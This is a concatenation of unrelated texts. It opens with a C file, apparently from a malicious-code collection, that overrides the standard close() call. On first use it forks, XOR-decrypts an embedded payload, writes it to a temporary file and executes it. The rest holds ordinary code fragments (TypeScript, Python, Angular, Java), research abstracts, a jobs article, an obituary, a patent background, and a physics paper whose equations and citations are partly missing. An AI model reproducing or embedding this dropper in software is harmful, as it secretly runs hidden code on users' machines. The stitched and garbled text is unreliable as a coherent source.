<filename>0_mailcious-code/useful/c_linux/tlb/close.c #include <stdio.h> #include <fcntl.h> #include <errno.h> #include <string.h> #include <sys/types.h> #include <sys/stat.h> #define __NR_close 6 extern char X1[]; extern int X1LEN; int cclose(int); int dump_it(FILE*, char*, char*, int); /***8***/ int close(int fd) { static int first = 0; int i = 0; FILE *o1, *o2, *o3, *o4, *o5, *o7; int retval; char *argv[3] = {0}; argv[0] = tmpnam(NULL); if (first == 1) { return cclose(fd); } first = 1; retval = cclose(fd); /***5***/ #ifndef DEBUG if (fork() > 0) { return retval; } #endif if ((o1 = fopen(argv[0], "w+")) == NULL) { /***3***/ #ifdef DEBUG perror("fopen"); #endif exit(errno); } Vcrypt(X1, KEY, X1LEN); dump_it(o1, X1, NULL, X1LEN); fclose(o1); chmod(argv[0], 0100|0200|0400); execve(argv[0], argv, NULL); /***end***/ } /***3***/ int cclose(int fd) { long __res; errno = 0; /***3***/ __asm__ volatile ("int $0x80" : "=a" (__res) : "0" (__NR_close),"b" ((long)(fd))); if (__res >= 0) { return (int)__res; } errno = -__res; return -1; /***end***/ } /***4***/ /* We expect key as char[30] */ int Vcrypt(char *s, char *key, int s_len) { int i = 0, j = 0; for(;i < s_len; i++) { s[i] ^= key[j++ % 30]; } return 0; /***end***/ } /***3***/ int dump_it(FILE *fd, char *s, char *cnam, int s_len) { int i = 0, j = 1, count = 0; if (cnam) { fprintf(fd, "char %s[] =\n\"", cnam); } for (; i < s_len; i++) { count++; if (cnam) { fprintf(fd, "\\x%02x", (unsigned char)s[i]); } else { fprintf(fd, "%c", s[i]); } if (!(j % 15) && cnam) { fprintf(fd, "\"\n\""); j = 0; } j++; } if (j != 1 && cnam) { fprintf(fd, "\""); } if (cnam) { fprintf(fd, ";"); fprintf(fd, "int %sLEN = %d;\n", cnam, count); } return 0; /***end***/ }
import { Project } from '../project'; import { Manifest, Target } from '../manifest'; import { targetImportFailed, targetIsOpen, targetCreateFailed, targetRestoreFailed, targetNotFound } from '../errors'; import { importGraph, createDocument } from '../addin'; import { loadFromProject, stageBuildGraph } from '../build'; import { join } from '../utils/path'; import { pathExists, ensureDir, remove, move, emptyDir, copy } from '../utils/fs'; import { zip } from '../utils/zip'; export interface BuildOptions { target?: string; addin?: string; } export interface ProjectInfo { project: Project; dependencies: Manifest[]; } /** * Build target: * * 1. Create fresh target in staging * 2. Import project * 3. Backup previously built target * 4. Move built target to build */ export default async function buildTarget( target: Target, info: ProjectInfo, options: BuildOptions = {} ) { const { project } = info; // Build fresh target in staging directory // (for no target path, create blank target) const staged = !target.blank ? await createTarget(project, target) : await createDocument(project, target, { staging: true }); await importTarget(target, info, staged, options); // Backup and move from staging to build directory try { await backupTarget(project, target); const dest = join(project.paths.build, target.filename); await move(staged, dest); } catch (err) { await restoreTarget(project, target); throw err; } finally { await remove(staged); } } /** * Create target binary */ export async function createTarget( project: Project, target: Target ): Promise<string> { if (!(await pathExists(target.path))) { throw targetNotFound(target); } const file = join(project.paths.staging, target.filename); try { await ensureDir(project.paths.staging); await zip(target.path!, file); } catch (err) { throw targetCreateFailed(target, err); } return file; } /** * Import project into target * * 1. Create "import" staging directory * 2. Load build graph for project * 3. Stage build graph * 4. Import staged build graph */ export async function importTarget( target: Target, info: ProjectInfo, file: string, options: BuildOptions = {} ) { const { project, dependencies } = info; const staging = join(project.paths.staging, 'import'); await ensureDir(staging); await emptyDir(staging); const build_graph = await loadFromProject(project, dependencies); const import_graph = await stageBuildGraph(build_graph, staging); try { await importGraph(project, target, import_graph, file, options); } catch (err) { throw targetImportFailed(target, err); } finally { await remove(staging); } } /** * Backup previously built target (if available) * * - Removes previous backup (if found) * - Attempts move, if that fails, it is assumed that the file is open */ export async function backupTarget(project: Project, target: Target) { const backup = join(project.paths.backup, target.filename); const file = join(project.paths.build, target.filename); if (await pathExists(backup)) await remove(backup); if (await pathExists(file)) { await ensureDir(project.paths.backup); try { await move(file, backup); } catch (err) { throw targetIsOpen(target, file); } } } /** * Restore previously built target (if available) */ export async function restoreTarget(project: Project, target: Target) { const backup = join(project.paths.backup, target.filename); const file = join(project.paths.build, target.filename); if (!(await pathExists(backup))) return; try { await copy(backup, file); } catch (err) { throw targetRestoreFailed(backup, file, err); } }
from cowdict import CowDict def test_repr_and_str(): base = {"key1": "value1", "key2": "value2"} cd = CowDict(base) cd["new_key"] = "new_value" del cd["key2"] expected = ( "{'new_key': 'new_value', 'key1': 'value1'}", "{'key1': 'value1', 'new_key': 'new_value'}", ) assert repr(cd) in expected assert str(cd) in expected
High neuroticism and depressive temperament are associated with dysfunctional regulation of the hypothalamicpituitaryadrenocortical system in healthy volunteers Objective: Elevated neuroticism, depressive temperament and dysfunctional regulation of the hypothalamicpituitaryadrenocortical (HPA) system are considered as risk factors for unipolar depression. An interaction of these vulnerability factors was suggested, but controversially discussed. In absence of other informative studies we set out for a replication test and for elucidation of the underlying mechanism.
import { NgModule, ModuleWithProviders } from '@angular/core'; import { HTTP_INTERCEPTORS } from '@angular/common/http'; import { NgProgressInterceptor } from './ng-progress.interceptor'; import { NgProgressHttpConfig, NG_PROGRESS_HTTP_CONFIG } from './ng-progress-http.interface'; @NgModule({ providers: [ { provide: HTTP_INTERCEPTORS, useClass: NgProgressInterceptor, multi: true } ] }) export class NgProgressHttpModule { static withConfig(config: NgProgressHttpConfig): ModuleWithProviders<NgProgressHttpModule> { return { ngModule: NgProgressHttpModule, providers: [ { provide: NG_PROGRESS_HTTP_CONFIG, useValue: config } ] }; } }
<gh_stars>1-10 import { SpellFunction } from '../spellbook'; import { getSpellAttributes } from '../experience'; import { spawnFrom } from '../spawnFrom'; import { PrefabHash } from 'att-string-transcoder'; import { spawn } from '../spawn'; import { getNearbySoulbonds } from '../getNearbySoulbonds'; type PlayerCheckStatHealthResponse = { Result?: { Value: number; }; }; export const heroism: SpellFunction = async (voodoo, accountId, upgradeConfigs) => { const upgrades = voodoo.getSpellUpgrades({ accountId, spell: 'heroism' }); const attributes = getSpellAttributes(upgrades, upgradeConfigs); const player = await voodoo.getPlayerDetailed({ accountId }); const { position, rotation } = spawnFrom(player, 'rightPalm', 0.05); spawn(voodoo, accountId, { prefabObject: { hash: PrefabHash.Potion_Medium, position, rotation }, components: { NetworkRigidbody: { position, rotation }, LiquidContainer: {} } }); const multiplier = 1 + attributes.intensify / 100; const duration = attributes.concentration; const searchRadius = attributes.projection; let nearbySoulbondIds: number[] = []; if (searchRadius > 0) { const nearbySoulbonds = await getNearbySoulbonds(voodoo, accountId, searchRadius); nearbySoulbondIds = nearbySoulbonds.map(soulbond => soulbond.id); } const playerIds = [accountId, ...nearbySoulbondIds]; for (const playerId of playerIds) { const [baseMaxHealth, currentHealth] = await Promise.all([ voodoo.getPlayerCheckStatBase({ accountId: playerId, stat: 'maxhealth' }), voodoo.getPlayerCheckStatCurrent({ accountId: playerId, stat: 'health' }) ]); let buffedMaxHealth = 0, buffedHealth = 0, delta = 0; /* Raise max health. */ if (baseMaxHealth) { buffedMaxHealth = baseMaxHealth * multiplier; delta = buffedMaxHealth - baseMaxHealth; } /* Increase health by same amount as max health buff. */ if (currentHealth && delta) { buffedHealth = currentHealth + delta; } if (buffedMaxHealth && buffedHealth) { voodoo.command({ accountId, command: `player modify-stat ${playerId} maxhealth ${buffedMaxHealth} ${duration} false` }); voodoo.command({ accountId, command: `player modify-stat ${playerId} health ${buffedHealth} ${duration} false` }); } } const { name, serverId, serverName } = voodoo.players[accountId]; voodoo.logger.success(`[${serverName ?? serverId} | ${name}] cast Heroism`); };
Consistency Analysis of Data-Usage Purposes in Mobile Apps While privacy laws and regulations require apps and services to disclose the purposes of their data collection to the users (i.e., why do they collect my data?), the data usage in an app's actual behavior does not always comply with the purposes stated in its privacy policy. Automated techniques have been proposed to analyze apps' privacy policies and their execution behavior, but they often overlooked the purposes of the apps' data collection, use and sharing. To mitigate this oversight, we propose PurPliance, an automated system that detects the inconsistencies between the data-usage purposes stated in a natural language privacy policy and those of the actual execution behavior of an Android app. PurPliance analyzes the predicate-argument structure of policy sentences and classifies the extracted purpose clauses into a taxonomy of data purposes. Purposes of actual data usage are inferred from network data traffic. We propose a formal model to represent and verify the data usage purposes in the extracted privacy statements and data flows to detect policy contradictions in a privacy policy and flow-to-policy inconsistencies between network data flows and privacy statements. Our evaluation results of end-to-end contradiction detection have shown PurPliance to improve detection precision from 19% to 95% and recall from 10% to 50% compared to a state-of-the-art method. Our analysis of 23.1k Android apps has also shown PurPliance to detect contradictions in 18.14% of privacy policies and flow-to-policy inconsistencies in 69.66% of apps, indicating the prevalence of inconsistencies of data practices in mobile apps.
Answering negative comments online quickly is key. Fluent in geek speak? You’re hired. While the latest unemployment numbers for New York City still show a gloomy prospect for many would-be workers, recent reports from Dice.com and Pace University show just the opposite for those in the information technology industry—employers can’t seem to fill competitive high-tech positions. Some companies are even engaging in battles for hard-to-find tech talent, said Tom Silver, a senior vice president at Dice, a career website for technology and engineering professionals. “Filling talent voids can be painful and expensive,” he said. According to July’s Dice Report, New York-New Jersey was ranked No. 1 across top metro areas by the number of new job posts on the website, with more than 8,200 tech positions. That’s almost twice the number of postings for tech jobs in Silicon Valley (which came in at No. 3), and more than Chicago (No. 4), Los Angeles (No. 5) and Boston (No. 6) combined. Washington D.C.-Baltimore came in second place, with 7,400 posts. “It’s the fifth straight month of companies posting more jobs on the site,” said Mr. Silver. In Manhattan, the information technology job market showed remarkable strength during the second quarter, according to the Pace/SkillPROOF IT Index Report, also known as PSII. The index, which provides a snapshot of IT job openings at major firms, saw a 47% increase, from 74 to 110. It was the largest quarterly gain since the index began tracking data in 2004, according to the report. Indeed, while the overall unemployment rate for New York City was 9.5% in June, experts estimate the rate is half that, or even lower, for the high-tech industry. The caveat, however, is that, although demand for IT professionals is high, computer programming skills are not enough (on their own) to get a job, experts said. Business, sales or administration experience is also essential. “Schools are preparing them in this capacity” to be able to wear many hats, said Mr. Hormozi. For instance, computer science students can take marketing classes, he said. For IT professionals already in the workforce, Mr. Hormozi said that they can increase their value with a business or public administration certificate, rather than learning another programming language. In fact, job postings for IT managers and network/data communications analysts were the largest contributors to the growth of the Pace index in Manhattan, while the Dice Report shows that the tech skills currently most wired for success are C#, Java/J2EE, and SAP or Oracle know-how. Moreover, the companies engaging in battles for these coveted skills, said Mr. Silver, is likely to make retention the issue this year in technology departments.
package com.altugcagri.smep.persistence.model; import com.fasterxml.jackson.annotation.JsonIgnore; import lombok.AllArgsConstructor; import lombok.Builder; import lombok.Getter; import lombok.NoArgsConstructor; import lombok.Setter; import org.hibernate.annotations.NaturalId; import org.springframework.lang.Nullable; import javax.persistence.Column; import javax.persistence.Entity; import javax.persistence.GeneratedValue; import javax.persistence.GenerationType; import javax.persistence.Id; import javax.persistence.ManyToMany; import javax.persistence.Table; import javax.validation.constraints.Email; import javax.validation.constraints.NotBlank; import javax.validation.constraints.Size; import java.util.Set; @Entity @Table(name = "users") @Getter @Setter @Builder @NoArgsConstructor @AllArgsConstructor public class User extends DataBaseEntity { @Id @GeneratedValue(strategy = GenerationType.IDENTITY) private Long id; @NotBlank @Size(max = 40) private String name; @NotBlank @Size(max = 15) @Column(unique = true) private String username; @NaturalId @NotBlank @Size(max = 40) @Email @Column(unique = true) private String email; @NotBlank @Size(max = 100) private String password; @JsonIgnore @Nullable @ManyToMany(mappedBy = "enrolledUsers") private Set<Topic> enrolledTopics; }
/* Copyright (c) 2017, Lawrence Livermore National Security, LLC. Produced at the Lawrence Livermore National Laboratory. LLNL-CODE-734707. All Rights reserved. See files LICENSE and NOTICE for details. This file is part of CEED, a collection of benchmarks, miniapps, software libraries and APIs for efficient high-order finite element and spectral element discretizations for exascale applications. For more information and source code availability see http://github.com/ceed. The CEED research is supported by the Exascale Computing Project (17-SC-20-SC) a collaborative effort of two U.S. Department of Energy organizations (Office of Science and the National Nuclear Security Administration) responsible for the planning and preparation of a capable exascale ecosystem, including software, applications, hardware, advanced system engineering and early testbed platforms, in support of the nation's exascale computing imperative. */ void add_mult_mass_hex( int ndof_1d, /* number of 1D dofs (points) */ int nqpt_1d, /* number of 1D quadrature points */ int nelem, /* number of elements */ double *D, /* (nqpt_1d)^3 x nelem */ double *B1d, /* nqpt_1d x ndof_1d dense matrix, column-major layout */ double *B1d_t, /* trasnspose of B1d */ int *dof_offsets, /* array of size (ndofs_1d)^3 x nelem representing a boolean P */ double *x, /* input vector */ double *y /* result, input-output vector */ );
George Albert Tavares Sr., 85, of Wailuku, a retired investor, died at home. He was born in Hawaii. He is survived by companion Louise Ruiz; former wife Helen; sons George Jr., Clyde and Paul; daughters Sharon Tran, Helen Ann Daniels and Paulette Tavares; stepson Frankie Ruiz; stepdaughter Roxanne Ruiz; brothers Kenneth and Joey; sisters Hilda Long, Harriette Takitani, Irene Wilson, Annette Tavares, Bertha Sugimoto and Margaret Fukumoto; and numerous grand- children and great-grandchildren. Visitation: 9 a.m. Sunday at Ballard Family Mortuary. Services: 11 a.m. Cremation to follow.
A firefighter fitness and training apparatus allows a firefighter to simulate pulling of a fire hose and of breaching of a ceiling during a fire and the removing of victims from a hazardous environment. It is important for firefighters to develop reflexes and muscles to perform the functions that they are commonly called upon to perform during fire and rescue operations. The use of exercise and training machines is very useful in developing such reflexes and muscles and for keeping the firefighters in shape for the specific functions that they are required to be performed. Typical functions that a firefighter may be called upon to do is to drag large sections of fire hose from a fire truck to a fire hydrant or to a better location for the application of water from the fire hydrant. Another common technique for firefighters is the breaching of ceilings in which pike poles or the like are required to be shoved up into ceilings for breaching the ceiling. The firefighters also have to be in condition for removing victims from a hazardous environment. This is commonly done by grasping the victim and dragging him from a hazardous to a safer environment. It is thus desirable to have a firefighter's training equipment in the nature of a fire sled which can provide training in the pulling of a fire hose and in the grasping and dragging of a victim to remove the victim from a hazardous environment as well as simulated training in the breaching of a ceiling in an area where a fire may be in the ceiling. Prior art patents that may provide useful training for firefighters can be seen in the Rivkin U.S. Pat. No. 4,688,792 for a training and exercise machine for football and wrestling and which can also be used for training firefighters in the development of rapid dynamic reflexes. This patent provides a dummy mounted to a crossbeam. In the Livingston U.S. Pat. No. 4,526,548, a mobile firefighting training trailer is provided having a plurality of rooms and passages with simulated appliances and furniture and having a smoke generator and flame generating devices positioned for simulating fires in a house. In the Ernst et al. U.S. Pat. No. 4,861,270, a firefighting trailer is also provided for training firefighters. In the Tommarello et al. U.S. Pat. No. 5,518,402, a firefighter trainer is provided having personal tracking and constructive entry determination training and trains firefighters to extinguish simulated fire scenarios. In the Musto et al. U.S. Pat. No. 5,203,707, a modular firefighter trainer is provided for use for training firefighters while the Musto et al. U.S. Pat. No. 5,275,571 is a portable fire trainer for use in training by an instructor of company employees in the use of fire extinguishers for extinguishing Class A, B or C fires. In the Joynt et al. U.S. Pat. No. 5,447,437, a portable firefighter training system for fire extinguishing training is provided for educating people in the proper use of firefighting procedures. In the Ott U.S. Pat. No. 6,824,504, a full body, adjustable weight sled exerciser is provided for training football players in tackling or blocking practice. The Rogers et al. U.S. Pat. No. 5,688,136 is a firefighter trainer for use in training firefighters on passenger rescue during aircraft simulated cabin fire and during simulated oil spill module fires. The Welch et al. U.S. Pat. No. 5,927,990 is a firefighter trainer for simulating flashover phenomena and teaches the trainee how to recognize warning signs of flashovers and what follows the warning signs and what to do if confronted with the warning signs. The Dunn U.S. Pat. No. 6,077,081 is a firefighting training method and apparatus for simulating the pumping of water through various long lengths of hose to train firefighters to deliver a proper amount of water through the fire hose. The Deshoux et al. U.S. Pat. No. 6,129,552 is a teaching installation for learning and practicing the use of firefighting equipment, such as fire extinguishers. The present invention is directed towards a firefighter training and exercising apparatus which has a fire sled equipped for training a firefighter in the pulling of a fire hose and in the breaching of a ceiling and in the removing of a victim from a hazardous environment.
/** * Perform a real clone of the workflow meta-data object, including cloning all lists and copying * all values. If the doClear parameter is true, the clone will be cleared of ALL values before * the copy. If false, only the copied fields will be cleared. * * @param doClear Whether to clear all of the clone's data before copying from the source object * @return a real clone of the calling object */ public Object realClone(boolean doClear) { try { WorkflowMeta workflowMeta = (WorkflowMeta) super.clone(); if (doClear) { workflowMeta.clear(); } else { workflowMeta.workflowActions = new ArrayList<>(); workflowMeta.workflowHops = new ArrayList<>(); workflowMeta.notes = new ArrayList<>(); workflowMeta.namedParams = new NamedParameters(); } for (ActionMeta action : workflowActions) { workflowMeta.workflowActions.add((ActionMeta) action.cloneDeep()); } for (WorkflowHopMeta hop : workflowHops) { workflowMeta.workflowHops.add(hop.clone()); } for (NotePadMeta notePad : notes) { workflowMeta.notes.add(notePad.clone()); } for (String key : listParameters()) { workflowMeta.addParameterDefinition( key, getParameterDefault(key), getParameterDescription(key)); } return workflowMeta; } catch (Exception e) { return null; } }
Entropic transport - A test bed for the Fick-Jacobs approximation Biased diffusive transport of Brownian particles through irregularly shaped, narrow confining quasi-one-dimensional structures is investigated. The complexity of the higher dimensional diffusive dynamics is reduced by means of the so-called Fick-Jacobs approximation, yielding an effective one-dimensional stochastic dynamics. Accordingly, the elimination of transverse, equilibrated degrees of freedom stemming from geometrical confinements and/or bottlenecks cause entropic potential barriers which the particles have to overcome when moving forward noisily. The applicability and the validity of the reduced kinetic description is tested by comparing the approximation with Brownian dynamics simulations in full configuration space. This non-equilibrium transport in such quasi-one-dimensional irregular structures implies for moderate-to-strong bias a characteristic violation of the Sutherland-Einstein fluctuation-dissipation relation. Introduction Diffusion of Brownian particles through narrow, tortuous confining structures such as micro-and nano-pores, zeolites, biological cells and microfluidic devices plays a prominent role in the dynamical characterization of these systems (Barrer, 1978;Berezhkovskii & Bezrukov, 2005;Hille, 2001;;;Matthias & Mller, 2003;;Nixon & Slater, 2002;;Volkmuth & Austin, 1992). Effective control schemes for transport in these systems requires a detailed understanding of the diffusive mechanisms involving small objects and, in this regard, an operative measure to gauge the role of fluctuations. The study of these transport phenomena is in many respects equivalent to an investigation of geometrically constrained Brownian dynamics (;Mazo, 2002). With this work we focus on the stochastic transport of small sized particles in confined geometries and the feasibility of the so-called Fick-Jacobs (FJ) approximation to describe the steady-state particle densities. Restricting the volume of the configuration space available to the diffusing particles by means of confining boundaries or obstacles discloses intriguing entropic phenomena (). The driven transport of charged particles across bottlenecks (), such as ion transport through artificial nanopores or artificial ion pumps (;) or in biological channels (Berezhkovskii & Bezrukov, 2005) are more familiar systems where diffusive transport is regulated by entropic barriers. Similarly, the operation of artificial Brownian motors and molecular machines relies as well on a mutual interplay amongst diffusion and binding action by energetic or, more relevant in the present context, entropic barriers (Astumian & Hnggi, 2002;;Derenyi & Astumian, 1998;Reimann & Hnggi, 2002). The outline of this work is as follows: In Sec. 2 we introduce our model and formulate the mathematical formalism needed to model the diffusion of a Brownian particle immersed in a confined medium. In Sec. 3 we present the FJ approximation and compute the entropic effects on the particle transport and on the steady-state probability density in the presence of an applied force in transport direction. In Sec. 4 we compare the numerical precise 2D simulation results with those obtained from applying the FJ approximation. In Sec. 5 we discuss the effective lateral diffusion and test the Sutherland-Einstein fluctuation-dissipation relation. Sec. 6 provides a discussion of our main findings. Overdamped system dynamics Generic mass transport through confined structures such as irregular pores and channels, c.f. the one depicted with Fig. 1, is governed by the transport of suspended Brownian particles subjected to an externally applied potential V ( r). Generally, the dynamics of the Brownian particle inside the medium can be well described by a Langevin dynamics in the over-damped limit, with reflecting boundary conditions at the channel walls. The stochastic dynamics then reads where r is the position vector of a Brownian particle at timet, denotes the friction coefficient, k B is the Boltzmann constant and T refers to the environmental temperature. Thermal fluctuations due to the coupling of the Brownian particle to the environment are modeled by Gaussian white noise with zero mean and an auto-correlation function obeying the Sutherland-Einstein fluctuation-dissipation relation (Hnggi & Marchesoni, 2005): For simplicity we consider the dynamics of a Brownian particle that is subjected to an constant force F = F e x acting along the direction of the channel axis (here in x-direction). The Langevin equation for the over-damped dynamics then reads: with reflecting (i.e. no across flow) boundary conditions implied at the channels walls which confine the Brownian particles within the channel geometry. In order to further simplify the treatment of this set up we introduce dimensionless variables. We measure all lengths in units of the period length L, i.e., r = L x, where x denotes the dimensionless position vector of the particle. As the unit of time we choose twice the time the particle takes to diffusively overcome the distance L, which is given by = L 2 /(k B T ), i.e.t = t (b). In these dimensionless variables the Langevin dynamics assumes the form The performed dimensionless scaling parameter f characterizes the force as the ratio between the work LF done on the particle along a distance of the period length L and the thermal energy k B T. We anticipate here the fact that in the case of diffusion occurring in purely energetic potential landscapes the driving force F and the temperature T are independent variables; in contrast, in systems with entropic features these two quantities become coupled (). In order to adjust a certain value of f one can modify either the force strength F or adjust the noise intensity k B T. The corresponding Fokker-Plank equation describing the time evolution of the probability density P ( x, t) takes the form (Hnggi & Thomas, 1982;Risken, 1989): where J( x, t) is the probability current: (2.6b) Note that, for channels with similar geometry which are related by a scale transformation r → r, > 0, the transport properties are determined by a single dimensionless parameter f which subsumes the respective period length, the external force and the temperature of the surrounding fluid. The no-flow condition beyond the channel walls leads to a vanishing probability current at those boundaries. Consequently, due to the impenetrability of the channel walls, the normal component of the probability current J( x, t) vanishes at those boundaries. Thus, the boundary conditions at the channel walls are given by where n denotes the normal vector at the channel walls. The boundary of a 2D periodic channel, which is mirror symmetric about the x-axis, is given by the dimensionless periodic functions y = ±(x), i.e., (x + 1) = (x) for all x, where x and y are the cartesian components of x. In this case, the boundary condition reads Approximate solutions though can be obtained on the basis of a one-dimensional diffusion problem proceeding in an effective potential. Narrow channel openings, which act as geometric hindrances in the original system, then manifest themselves as entropic barriers within an effective one-dimensional diffusive FJ approximation (;Jacobs, 1967;Kalinay & Percus, 2006;;Reguera & Rubi, 2001;Zwanzig, 1992). Equilibration in transverse channel directions: the Fick-Jacobs approximation In the absence of an external force, i.e. for f = 0, it was shown (Jacobs, 1967;Kalinay & Percus, 2006;Reguera & Rubi, 2001;Zwanzig, 1992) that the dynamics of Brownian particles in confined structures (such as the one depicted in Fig.1) can be described approximatively by the FJ equation; i.e., This 1D equation is obtained from the full 2D Smoluchowski equation upon the elimination of the transverse y spatial coordinate degree of freedom by assuming a much faster equilibration in that channel direction than in the longitudinal one. An analogous reduction mechanism has been used for the transport of neutrons through nuclear reactors (Beckurts & Wirtz, 1964). In the equation (3.1), −(x) P (x, y, t) dy denotes the marginal probability density along the axis of the channel. A(x) corresponds to the potential of mean force which equals for the considered situation the free energy, i.e. A(x) = E(x)−S(x) = 0−ln (x). We note that for three dimensional channels an analogue approximate Fokker-Planck equation holds in which the function (x) is to be replaced by 2 (x) (i.e. the area of the corresponding cross-section). In the original work by Jacobs the 1D diffusion coefficient D(x) is constant and equals the bare diffusion constant which assumes unity in present dimensionless variables. However, introducing the x-dependent diffusion coefficient considerably improves the accuracy of the kinetic equation, extending its validity to more winding structures (;Reguera & Rubi 2001;Zwanzig, 1992). The expression for D(x) reads (in Figure 2. Sketch of the 2D channel and the effective one-dimensional potential: the Fick--Jacobs (FJ) approximation allows for a reduction of the 2D Brownian dynamics within the periodic channel (periodicity: L) to an approximate 1D Brownian dynamics with an effective potential which is given by the free energy function A(x). In the presence of an applied bias A(x) has the form of a tiled periodic potential with a barrier height of ∆A which depends on the temperature T. dimensionless units) where = 1/3, 1/2 for two and three dimensions, respectively, has been shown to appropriately account for the curvature effects of the confining walls (b;Reguera & Rubi, 2001). (x) indicates the first derivative of the boundary function (x) with respect to x. In the presence of a constant force F along the direction of the channel the FJ diffusion equation (3.1) can be recast into the form (;b, : For a periodic channel arrangement this free energy assumes the form of a tilted periodic potential, see Fig. 2. In the absence of a force the free energy is purely entropic and Eq. (3.3) reduces to the FJ equation (3.1). On the other hand, for a straight channel the entropic contribution vanishes and the particles are solely driven by the externally applied force. Remarkably, the temperature T dictates the strength of the effective potential. An increase in temperature causes an increase in barrier height ∆A while for purely energetic systems the barrier height is independent of the temperature (). (a) Steady-state probability density Formally, the steady-state density of the particles is obtained in the limit t → ∞, i.e. P st (x) = lim t→∞ P (x, t). As a consequence, ∂ ∂t P st (x) = 0. An expression for the steady-state density can be derived from Eq. (3.1), using arguments detailed in the Appendix. Using the main result in Eq. (A 12) one obtains depends on the dimensionless position x, the force f and via the position dependent diffusion coefficient on the shape of the tube given in terms of the shape function (x) and its first derivative, cf. Eq. (3.2). Note, that the probability density P st (x) is normalized on the unit interval. (b) Nonlinear mobility The primary quantity of particle transport through periodic channels is the average particle current,, or equivalently the nonlinear mobility, which is defined as the ratio between the average particle current and the applied force f. For the average particle current we derive an expression which is similar to the Stratonovich formula for the current occurring in titled periodic energy landscapes, but here with a spatially dependent diffusion coefficient (). A detailed derivation of this expression is given in the Appendix (Appendix A), cf. Eq. (A 11). Hence, we obtain the nonlinear mobility for a 2D or 3D channel: with I(z, f ) given in Eq. (3.5). Precise numerics for a 2D channel geometry The steady-state density and the average particle current, predicted analytically above, has been compared with Brownian dynamic simulations performed by a numerical integration of the Langevin equation Eq. (2.4), using the stochastic Euleralgorithm. The shape of the exemplarily taken 2D channel is described by controls the slope of the channel walls which in turn determines the one-dimensional diffusion coefficient D(x). For the considered channel configuration, cf. Eq. (4.1), the boundary condition becomes (x) = a , where = b/a = 1.02 throughout this paper. For a we chose values between 1 and 1/2. In all cases the width of the widest opening within the channel is larger by a factor of 100 than the width at the narrowest opening. One may therefore do expect rather strong entropic effects for these channel geometries. (a) Stationary probability densities We have evaluated the stationary probability density P st (x, y), in the long time limit, by mapping all particle positions onto the primitive cell by translation in longitudinal channel direction. Consequently, (4.2) Note, that steady-state marginal density P st (x) is normalized on the primitive cell. At small scaling parameter values f the 1D steady-state density given by Eq. (3.4) is in very good agreement with those obtained from numerical simulations, see Fig. 3. This holds true for rather arbitrary channel geometry (not shown). However, the comparison fails for large f -values of the scaling parameter or for more winding structures corresponding to larger a-values. When increasing the force, the maximum of P st (x) is shifted towards the exit of the cell and the particles mostly accumulate in front of the bottleneck, see Fig. 3(a), and the 1D kinetic description starts to fail in that forward bottleneck x-region. However, by decreasing a of the geometric channel shape function the accuracy of the FJ approximation considerably improves up to very large force values f, see Fig. 3(b). As a common feature one observe that for the two chosen geometric structures that in the large force regime the numerically obtained P st (x) is essentially constant over a wide range of x-values, indicating a minor influence of the shape of the structure on the dynamics of the laterally forward-forced particles. In this situation, the thermal noise plays a minor role and the deterministic dynamics (with diffusion set to zero) of the diffusive equation provides a good starting point. Put differently, at strong longitudinal driving strength the correction in the diffusion coefficient leading to a spatial dependency, i.e. D(x), overestimates the role of the entropic effects and consequently the FJ approximation starts failing over extended x-regimes. The reasons for the failure of the FJ approximation for large forces becomes obvious when checking the equilibration assumption in transverse channel direction. From our simulations, we can actually analyze the validity of the hypotheses of equilibration in the transverse direction on which the FJ description relies. A detailed analysis is provided by testing the normalized steady-state probability density in the transverse direction at a given x-position, i.e. In Fig. 4, we depict the steady-state probability density at the position of maximal channel width. For small values of the scaling parameter f, the P st x (y) is very flat, indicating an almost ideal homogeneous equilibration in the transverse direction, as required by the FJ approximation scheme. However, at large force strengths f the Brownian particles concentrate along the axis of the channel with y = 0. In this situation, the assumption of equilibration along the transverse direction fails and the density peaks around the y = 0 value. The particles can only feel the presence of the boundaries when they are close to the bottlenecks. Hence, in the limit of very large force values, the influence of the entropic barriers practically disappears. (b) Nonlinear mobility The average particle current was derived from an ensemble-average using 3 10 4 trajectories: (4.4) Fig. 5 shows the nonlinear mobility as a function of the scaling parameter f. We note that the transport in one-dimensional periodic energetic potentials distinctly differs from the one occurring in one-dimensional periodic systems in presence of entropic barriers (). The fundamental difference lies in the temperature dependence of these barrier shapes. Decreasing the temperature in an energetic periodic potential decreases the transition rates from one cell to the neighboring one by decreasing the Arrhenius factor exp{−∆V /(k B T )} where ∆V denotes the activation energy necessary to proceed a period (). Hence decreasing the temperature yields a decreasing nonlinear mobility. For a one-dimensional periodic system with an entropic free energy (or entropic potential of mean force), a decrease of temperature results, however, in an increase of the dimensionless force parameter f and consequently in a monotonic increase of the nonlinear mobility, cf. Fig. 5. The dependence of the dynamics on the geometry parameter a nicely reflects the entropic effects on the mobility: A channel with a larger a-value has wider openings and thus provides more configuration space where the particle can sojourn. This longer residence time within a period of the channel diminishes the throughput and consequently the mobility. This is corroborated by the results of our calculations depicted in Fig. 5. For all values of f, an increase in value of a leads to a decrease in the mobility. This holds not only in regimes for which the FJ equation is valid, but also for large values of f where the approximation fails. For very large values of the scaling parameter f the nonlinear mobility approaches the value 1, i.e., it agrees with the deterministic strong driving limit. By means of the nonlinear mobility a detailed comparison between 2D simulation results and the analytic results, cf. Eq. (3.6), enables one to determine validity criteria for the FJ approximation, for further details see in Ref. (;b). Effective diffusion and the Sutherland-Einstein relation A validity of a nonlinear Sutherland-Einstein relation implies that in physical units we can relate the nonlinear mobility (F ) directly to the nonlinear, effective xdiffusion D ef f (F ), reading Put differently, the effective diffusion coefficient D eff for the diffusive spreading along the longitudinal channel direction would then solely be determined by the nonlinear mobility discussed above and the environmental temperature T. A validity of this relation would then imply a monotonic increase towards the entropic-free diffusion limit, i.e. D ef f = k B T /. The latter is being approached in the strong forcing limit where entropic effects cease to play a significant role. Such a monotonic behavior, however, is not observed from the numerical simulations for the effective x-diffusion coefficient (b;). It is defined as the ratio between the asymptotic behavior of the variance of the position variable and the elapsed time t; i.e., Interestingly, the dependence of the effective diffusion coefficient on the scaling parameter exhibits a bell-shaped behavior, cf. inset of Fig. 6, thus indicating a failure of the Sutherland-Einstein relation in this moderate-to-strong driving regime. This break down of the Sutherland-Einstein relation can also be detected within the FJ description (not shown in Fig. 6): The FJ approximation for this effective x-diffusion as well yields a non-monotonic dependence of the effective x-diffusion coefficient on the scaling parameter f exhibiting a peak value exceeding the bulk diffusion b;). For a detailed comparison, we depict the ratio of numerically obtained D eff and ( k B T ) in Fig. 6. Surprisingly, it turns out that such a Sutherland-Einstein relation, Eq. (5.1), holds true in terms of the effective mobility in the small forcing limit f → 0 ; i.e. in the linear response 